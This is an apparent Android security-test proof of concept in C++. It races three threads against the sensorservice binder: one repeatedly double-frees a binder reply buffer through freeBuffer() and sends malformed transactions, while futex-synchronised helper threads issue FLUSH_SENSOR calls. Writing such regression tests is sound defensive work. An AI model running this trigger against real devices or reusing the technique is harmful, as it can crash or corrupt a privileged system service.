1 /**
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #include "../includes/common.h"
18
19 #if _64BIT
20
21 #include <cutils/ashmem.h>
22 #include <dlfcn.h>
23 #include <fcntl.h>
24 #include <linux/futex.h>
25 #include <pthread.h>
26 #include <sensor/ISensorEventConnection.h>
27 #include <sensor/ISensorServer.h>
28 #include <sensor/Sensor.h>
29 #include <stdio.h>
30 #include <stdlib.h>
31 #include <sys/mman.h>
32 #include <sys/prctl.h>
33 #include <sys/stat.h>
34 #include <sys/syscall.h>
35 #include <sys/types.h>
36 #include <sys/wait.h>
37 #include <sys/xattr.h>
38 #include <utils/Vector.h>
39
40 #include "IPCThreadState.h"
41 #include "binder/IServiceManager.h"
42
43
using namespace android;

// States exchanged through attack_signal: the bcfree_helper() threads wait in
// FUTEX_WAIT while the flag reads SLEEP and are released once bcfree() stores
// ATTACK and issues FUTEX_WAKE.
#define SLEEP 0
#define ATTACK 1
// Identity handed to ISensorServer::createSensorEventConnection() by every
// worker thread.
String8 packageName("hexb1n");
String16 opPackageName("");

// Deadline handle produced by start_timer() in main(); each worker loops
// while timer_active(test_started) holds (both helpers come from common.h).
time_t test_started;

// Flag shared by the worker threads. It is read and written without a lock;
// the only ordering between writer and waiters is the futex call pair in
// bcfree()/bcfree_helper(). NOTE(review): volatile is not a synchronisation
// primitive; a std::atomic<int> would express the intent (my_futex() takes
// the address, so the signature would need to follow).
static volatile int attack_signal;
// Thin wrapper over the futex(2) system call, invoked through syscall(2)
// because the test drives FUTEX_WAIT_PRIVATE/FUTEX_WAKE_PRIVATE directly on
// attack_signal. Returns the raw syscall result narrowed to int: -1 with
// errno set on failure (for FUTEX_WAIT this includes EAGAIN when *uaddr != val).
int my_futex(volatile int *uaddr, int op, int val,
             const struct timespec *timeout, int *uaddr2, int val3) {
    const long result = syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
    return static_cast<int>(result);
}
58
// Worker thread that repeatedly issues FLUSH_SENSOR on a sensor event
// connection, pacing each iteration on attack_signal: it blocks in
// FUTEX_WAIT while attack_signal == SLEEP and proceeds once bcfree() stores
// ATTACK and wakes it. Runs until timer_active(test_started) is false and
// always returns NULL; the pthread argument p is unused.
static void *bcfree_helper(void *p) {
    (void) p;
    Parcel data, reply;  // NOTE(review): unused; shadowed by the pair declared in the loop.
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> binder = sm->getService(String16("sensorservice"));
    // NOTE(review): no null check — if "sensorservice" is not registered,
    // binder and therefore sensor are null and the call below dereferences it.
    sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder);
    sp<ISensorEventConnection> sensorEventConnection =
        sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/,
                                            opPackageName);
    while (timer_active(test_started)) {
        Parcel data, reply;
        data.writeInterfaceToken(String16("android.gui.SensorEventConnection"));
        // Returns at once if attack_signal already differs from SLEEP; the
        // result (including spurious wake-ups) is not examined, so the loop
        // may proceed without bcfree() having signalled.
        my_futex(&attack_signal, FUTEX_WAIT_PRIVATE, SLEEP, NULL, NULL, 0);
        usleep(100);
        // Transaction code 4 (FLUSH_SENSOR) on the connection's binder; the
        // status returned by transact() is ignored.
        IInterface::asBinder(sensorEventConnection)
            ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0);
    }

    return NULL;
}
79
// Worker thread driving the sequence under test. Per iteration it (1) issues
// FLUSH_SENSOR (code 4) and then calls IPCThreadState::freeBuffer() 48 times
// on the same reply.data() pointer, (2) stores ATTACK into attack_signal and
// wakes the bcfree_helper() threads, and (3) sends 21 transactions carrying a
// code (0xdeadbfff) that is not FLUSH_SENSOR and flags 0x2f2f, before
// resetting attack_signal to SLEEP. Runs until timer_active(test_started) is
// false and always returns NULL; the pthread argument p is unused.
static void *bcfree(void *p) {
    (void) p;
    Parcel data, reply;  // NOTE(review): unused; shadowed by the pair declared in the loop.
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> binder = sm->getService(String16("sensorservice"));
    // NOTE(review): no null check — if "sensorservice" is not registered,
    // binder and therefore sensor are null and the call below dereferences it.
    sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder);
    sp<ISensorEventConnection> sensorEventConnection =
        sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/,
                                            opPackageName);
    while (timer_active(test_started)) {
        Parcel data, reply;
        data.writeInterfaceToken(String16("android.gui.SensorEventConnection"));

        {
            // The transact() status is ignored; rmData is read from the reply
            // regardless of whether the transaction succeeded.
            IInterface::asBinder(sensorEventConnection)
                ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0);
            const uint8_t *rmData = reply.data();
            // The same pointer is handed to freeBuffer() 48 times in a row.
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
            IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
        }

        // Release the helper threads blocked in FUTEX_WAIT. The store and the
        // wake are not otherwise ordered against the helpers' reads.
        attack_signal = ATTACK;
        my_futex(&attack_signal, FUTEX_WAKE_PRIVATE, 1, NULL, NULL, 0);
        usleep(100);
        {
            // 1 + 20 transactions with a code that is not FLUSH_SENSOR (4,
            // used above) and flags 0x2f2f; every transact() status is ignored.
            Parcel data, reply;
            IInterface::asBinder(sensorEventConnection)
                ->transact(0xdeadbfff /* not the FLUSH_SENSOR code (4) used above */, data, &reply, 0x2f2f);
            for (int i = 0; i < 20; i++)
                IInterface::asBinder(sensorEventConnection)
                    ->transact(0xdeadbfff /* not the FLUSH_SENSOR code (4) used above */, data, &reply, 0x2f2f);
        }
        attack_signal = SLEEP;
    }

    return NULL;
}
163
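// 64-bit entry point: arms the test deadline, then runs one bcfree() thread
// alongside two bcfree_helper() threads until timer_active(test_started)
// stops reporting true. Returns EXIT_SUCCESS once all three threads were
// created and joined, EXIT_FAILURE if any pthread_create() fails — the
// original code ignored that status and would have joined an uninitialised
// pthread_t, which is undefined behaviour.
int main() {
    pthread_t threads[3];
    void *(*const entries[3])(void *) = {bcfree_helper, bcfree, bcfree_helper};
    size_t started = 0;

    // The deadline must be set before any worker reads test_started.
    test_started = start_timer();

    for (; started < 3; ++started) {
        const int rc = pthread_create(&threads[started], NULL, entries[started], NULL);
        if (rc != 0) {
            // pthread_create() returns the error number rather than setting errno.
            fprintf(stderr, "pthread_create(%zu) failed: %d\n", started, rc);
            break;
        }
    }
    // Join only the threads that were actually created; the others have no
    // valid handle.
    for (size_t i = 0; i < started; ++i) {
        pthread_join(threads[i], NULL);
    }
    return started == 3 ? EXIT_SUCCESS : EXIT_FAILURE;
}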
177
178 #else
// 32-bit build: the test body above only compiles for 64-bit, but the push
// step still expects a binary to exist, so this stub provides one and exits
// successfully without doing anything.
int main() {
    return 0;
}
183 #endif
184